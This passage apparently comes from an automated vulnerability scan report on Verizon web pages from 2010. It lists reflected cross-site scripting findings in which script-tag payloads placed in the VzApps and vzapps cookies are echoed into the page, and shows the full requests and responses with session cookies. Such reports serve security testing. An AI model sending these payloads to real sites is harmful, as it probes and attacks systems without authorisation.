Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX8e301'><script>alert(1)</script>715a473175c; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 67990
Expires: Sat, 20 Nov 2010 03:14:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:38 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX8e301'><script>alert(1)</script>715a473175c; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet:&nbsp;Compare to&nbsp;Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX8E301'><SCRIPT>ALERT(1)</SCRIPT>715A473175C ' />
...[SNIP]...

2.908. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1bbd6'><script>alert(1)</script>c865fc14b77 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX1bbd6'><script>alert(1)</script>c865fc14b77; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68022
Expires: Sat, 20 Nov 2010 03:14:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:25 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX1bbd6'><script>alert(1)</script>c865fc14b77; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet:&nbsp;Compare to&nbsp;Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX1BBD6'><SCRIPT>ALERT(1)</SCRIPT>C865FC14B77 ' />
...[SNIP]...

2.909. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1327c'><script>alert(1)</script>eb0b45a8082 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX1327c'><script>alert(1)</script>eb0b45a8082; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68022
Expires: Sat, 20 Nov 2010 00:11:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:52 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX1327c'><script>alert(1)</script>eb0b45a8082; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet:&nbsp;Compare to&nbsp;Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX1327C'><SCRIPT>ALERT(1)</SCRIPT>EB0B45A8082 ' />
...[SNIP]...

2.910. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9ed63'><script>alert(1)</script>aba8646129c was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX9ed63'><script>alert(1)</script>aba8646129c; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68020
Expires: Sat, 20 Nov 2010 03:14:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:48 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX9ed63'><script>alert(1)</script>aba8646129c; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet:&nbsp;Compare to&nbsp;Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX9ED63'><SCRIPT>ALERT(1)</SCRIPT>ABA8646129C ' />
...[SNIP]...

2.911. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c0257'><script>alert(1)</script>be1613d7d65 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXc0257'><script>alert(1)</script>be1613d7d65; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68019
Expires: Sat, 20 Nov 2010 00:09:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:22 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXc0257'><script>alert(1)</script>be1613d7d65; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet:&nbsp;Compare to&nbsp;Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXC0257'><SCRIPT>ALERT(1)</SCRIPT>BE1613D7D65 ' />
...[SNIP]...

2.912. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/ [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Installation/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6487d'><script>alert(1)</script>b45a269dda5 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Installation/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX6487d'><script>alert(1)</script>b45a269dda5; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; 